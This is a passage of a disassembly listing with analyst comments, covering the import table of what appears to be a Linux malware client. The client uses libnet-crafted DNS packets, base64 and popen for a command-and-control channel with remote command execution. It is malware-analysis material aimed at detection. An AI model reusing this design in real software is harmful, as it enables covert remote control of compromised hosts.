extern:00021F10                                         ; DATA XREF: .got:ns_parserr_ptro
extern:00021F14 ; char *fgets(char *s, int n, FILE *stream)
extern:00021F14 IMPORT __imp_fgets                      ; CODE XREF: fgets+8j
extern:00021F14                                         ; DATA XREF: .got:fgets_ptro
extern:00021F18 ; void *calloc(size_t nmemb, size_t size)
extern:00021F18 IMPORT __imp_calloc                     ; CODE XREF: calloc+8j
extern:00021F18                                         ; DATA XREF: .got:calloc_ptro
extern:00021F1C ; uint16_t htons(uint16_t hostshort)
extern:00021F1C IMPORT __imp_htons                      ; CODE XREF: htons+8j
extern:00021F1C                                         ; DATA XREF: .got:htons_ptro
extern:00021F20 ; struct __res_state *__res_state(void)
extern:00021F20 IMPORT __imp___res_state                ; CODE XREF: __res_state+8j
extern:00021F20                                         ; DATA XREF: .got:__res_state_ptro
extern:00021F24 ; void free(void *ptr)
extern:00021F24 IMPORT __imp_free                       ; CODE XREF: free+8j
extern:00021F24                                         ; DATA XREF: .got:free_ptro
extern:00021F28 IMPORT __imp_BIO_push                   ; CODE XREF: BIO_push+8j
extern:00021F28                                         ; DATA XREF: .got:BIO_push_ptro
extern:00021F2C IMPORT __imp_BIO_read                   ; CODE XREF: BIO_read+8j
extern:00021F2C                                         ; DATA XREF: .got:BIO_read_ptro
extern:00021F30 ; int fprintf(FILE *stream, const char *format, ...)
extern:00021F30 IMPORT __imp_fprintf                    ; CODE XREF: fprintf+8j
extern:00021F30                                         ; DATA XREF: .got:fprintf_ptro
extern:00021F34 IMPORT __imp_BIO_f_base64               ; CODE XREF: BIO_f_base64+8j
extern:00021F34                                         ; DATA XREF: .got:BIO_f_base64_ptro
extern:00021F38 IMPORT __imp_libnet_get_ipaddr4
extern:00021F38                                         ; CODE XREF: libnet_get_ipaddr4+8j
extern:00021F38                                         ; DATA XREF: .got:libnet_get_ipaddr4_ptro
extern:00021F3C ; void *memcpy(void *dest, const void *src, size_t n)
extern:00021F3C IMPORT __imp_memcpy                     ; CODE XREF: memcpy+8j
extern:00021F3C                                         ; DATA XREF: .got:memcpy_ptro
extern:00021F40 IMPORT __imp_libnet_build_ipv4
extern:00021F40                                         ; CODE XREF: libnet_build_ipv4+8j
extern:00021F40                                         ; DATA XREF: .got:libnet_build_ipv4_ptro
extern:00021F44 IMPORT __imp_libnet_destroy             ; CODE XREF: libnet_destroy+8j
extern:00021F44                                         ; DATA XREF: .got:libnet_destroy_ptro
extern:00021F48 ; int pclose(FILE *stream)
extern:00021F48 IMPORT __imp_pclose                     ; CODE XREF: pclose+8j
extern:00021F48                                         ; DATA XREF: .got:pclose_ptro
extern:00021F4C ; void *memset(void *s, int c, size_t n)
extern:00021F4C IMPORT __imp_memset                     ; CODE XREF: memset+8j
extern:00021F4C                                         ; DATA XREF: .got:memset_ptro
extern:00021F50 IMPORT __imp_res_init                   ; CODE XREF: res_init+8j
extern:00021F50                                         ; DATA XREF: .got:res_init_ptro
extern:00021F54 ; FILE *popen(const char *command, const char *modes)
extern:00021F54 ; popen() runs its argument through the shell; the only mode string in .rodata is
extern:00021F54 ; aR ("r"), referenced from EXEC_command. Monitoring for this process's children
extern:00021F54 ; is the natural host-side detection for the EXEC action.
extern:00021F54 IMPORT __imp_popen                      ; CODE XREF: popen+8j
extern:00021F54                                         ; DATA XREF: .got:popen_ptro
extern:00021F58 IMPORT __imp_BIO_set_flags              ; CODE XREF: BIO_set_flags+8j
extern:00021F58                                         ; DATA XREF: .got:BIO_set_flags_ptro
extern:00021F5C IMPORT __imp_BIO_new_mem_buf            ; CODE XREF: BIO_new_mem_buf+8j
extern:00021F5C                                         ; DATA XREF: .got:BIO_new_mem_buf_ptro
extern:00021F60 IMPORT __imp_res_query                  ; CODE XREF: res_query+8j
extern:00021F60                                         ; DATA XREF: .got:res_query_ptro
extern:00021F64 IMPORT __imp_BIO_new                    ; CODE XREF: BIO_new+8j
extern:00021F64                                         ; DATA XREF: .got:BIO_new_ptro
extern:00021F68 IMPORT __imp_BIO_ctrl                   ; CODE XREF: BIO_ctrl+8j
extern:00021F68                                         ; DATA XREF: .got:BIO_ctrl_ptro
extern:00021F6C ; size_t fwrite(const void *ptr, size_t size, size_t n, FILE *s)
extern:00021F6C IMPORT __imp_fwrite                     ; CODE XREF: fwrite+8j
extern:00021F6C                                         ; DATA XREF: .got:fwrite_ptro
extern:00021F70 ; FILE *fopen(const char *filename, const char *modes)
extern:00021F70 IMPORT __imp_fopen                      ; CODE XREF: fopen+8j
extern:00021F70                                         ; DATA XREF: .got:fopen_ptro
extern:00021F74 ; int snprintf(char *s, size_t maxlen, const char *format, ...)
extern:00021F74 IMPORT __imp_snprintf                   ; CODE XREF: snprintf+8j
extern:00021F74                                         ; DATA XREF: .got:snprintf_ptro
extern:00021F78 ; libnet_init selects the injection layer; a raw-IPv4 injector needs CAP_NET_RAW
extern:00021F78 ; (root in practice), which is a useful assumption to verify when assessing impact.
extern:00021F78 IMPORT __imp_libnet_init                ; CODE XREF: libnet_init+8j
extern:00021F78                                         ; DATA XREF: .got:libnet_init_ptro
extern:00021F7C ; int __cdecl __libc_start_main(int (__cdecl *main)(int, char **, char **), int argc, char **ubp_av, void (*init)(void), void (*fini)(void), void (*rtld_fini)(void), void *stack_end)
extern:00021F7C IMPORT __imp___libc_start_main
extern:00021F7C                                         ; CODE XREF: __libc_start_main+8j
extern:00021F7C                                         ; DATA XREF: .got:__libc_start_main_ptro
extern:00021F80 ; int fseek(FILE *stream, __int32 off, int whence)
extern:00021F80 IMPORT __imp_fseek                      ; CODE XREF: fseek+8j
extern:00021F80                                         ; DATA XREF: .got:fseek_ptro
extern:00021F84 ; int fclose(FILE *stream)
extern:00021F84 IMPORT __imp_fclose                     ; CODE XREF: fclose+8j
extern:00021F84                                         ; DATA XREF: .got:fclose_ptro
extern:00021F88 IMPORT __imp_libnet_build_dnsv4
extern:00021F88                                         ; CODE XREF: libnet_build_dnsv4+8j
extern:00021F88                                         ; DATA XREF: .got:libnet_build_dnsv4_ptro
extern:00021F8C IMPORT __imp_BIO_free_all               ; CODE XREF: BIO_free_all+8j
extern:00021F8C                                         ; DATA XREF: .got:BIO_free_all_ptro
extern:00021F90 ; int inet_aton(const char *cp, struct in_addr *inp)
extern:00021F90 ; Presumably parses a172_16_240_129 (via dword_21E74) - confirm in send_packet_to_C_C.
extern:00021F90 IMPORT __imp_inet_aton                  ; CODE XREF: inet_aton+8j
extern:00021F90                                         ; DATA XREF: .got:inet_aton_ptro
extern:00021F94 IMPORT __imp_libnet_write               ; CODE XREF: libnet_write+8j
extern:00021F94                                         ; DATA XREF: .got:libnet_write_ptro
extern:00021F98 IMPORT __imp_libnet_geterror            ; CODE XREF: libnet_geterror+8j
extern:00021F98                                         ; DATA XREF: .got:libnet_geterror_ptro
extern:00021F9C ; unsigned int sleep(unsigned int seconds)
extern:00021F9C IMPORT __imp_sleep                      ; CODE XREF: sleep+8j
extern:00021F9C                                         ; DATA XREF: .got:sleep_ptro
extern:00021FA0 ; size_t strlen(const char *s)
extern:00021FA0 IMPORT __imp_strlen                     ; CODE XREF: strlen+8j
extern:00021FA0                                         ; DATA XREF: .got:strlen_ptro
extern:00021FA4 IMPORT __imp_libnet_build_udp
extern:00021FA4                                         ; CODE XREF: libnet_build_udp+8j
extern:00021FA4                                         ; DATA XREF: .got:libnet_build_udp_ptro
extern:00021FA8 IMPORT __imp_BIO_write                  ; CODE XREF: BIO_write+8j
extern:00021FA8                                         ; DATA XREF: .got:BIO_write_ptro
extern:00021FAC IMPORT __imp_libnet_name2addr4
extern:00021FAC                                         ; CODE XREF: libnet_name2addr4+8j
extern:00021FAC                                         ; DATA XREF: .got:libnet_name2addr4_ptro
extern:00021FB0 IMPORT __imp_BIO_s_mem                  ; CODE XREF: BIO_s_mem+8j
extern:00021FB0                                         ; DATA XREF: .got:BIO_s_mem_ptro
extern:00021FB4 ; void __assert_fail(const char *assertion, const char *file, unsigned int line, const char *function)
extern:00021FB4 ; Reached from base64_decode with aClient_c / aLengthDecodele (.rodata): assert() was
extern:00021FB4 ; compiled in, so a malformed base64 payload aborts the client instead of being handled.
extern:00021FB4 IMPORT __imp___assert_fail              ; CODE XREF: __assert_fail+8j
extern:00021FB4                                         ; DATA XREF: .got:__assert_fail_ptro
extern:00021FB8 ; void *malloc(size_t size)
extern:00021FB8 IMPORT __imp_malloc                     ; CODE XREF: malloc+8j
extern:00021FB8                                         ; DATA XREF: .got:malloc_ptro
extern:00021FBC ; __int32 ftell(FILE *stream)
extern:00021FBC IMPORT __imp_ftell                      ; CODE XREF: ftell+8j
extern:00021FBC                                         ; DATA XREF: .got:ftell_ptro
extern:00021FC0 ; The four WEAK imports below are standard GCC crtbegin/crtend references
extern:00021FC0 ; (TM clone table and .eh_frame registration); they are CRT support, not sample logic.
extern:00021FC0 IMPORT _ITM_deregisterTMCloneTable, WEAK
extern:00021FC4 IMPORT __imp___deregister_frame_info, WEAK
extern:00021FC4                                         ; CODE XREF: __deregister_frame_info+8j
extern:00021FC4                                         ; DATA XREF: .got:__deregister_frame_info_ptro
extern:00021FC8 IMPORT __imp___register_frame_info, WEAK
extern:00021FC8                                         ; CODE XREF: __register_frame_info+8j
extern:00021FC8                                         ; DATA XREF: .got:__register_frame_info_ptro
extern:00021FCC IMPORT _ITM_registerTMCloneTable, WEAK
extern:00021FCC
extern:00021FCC                 END start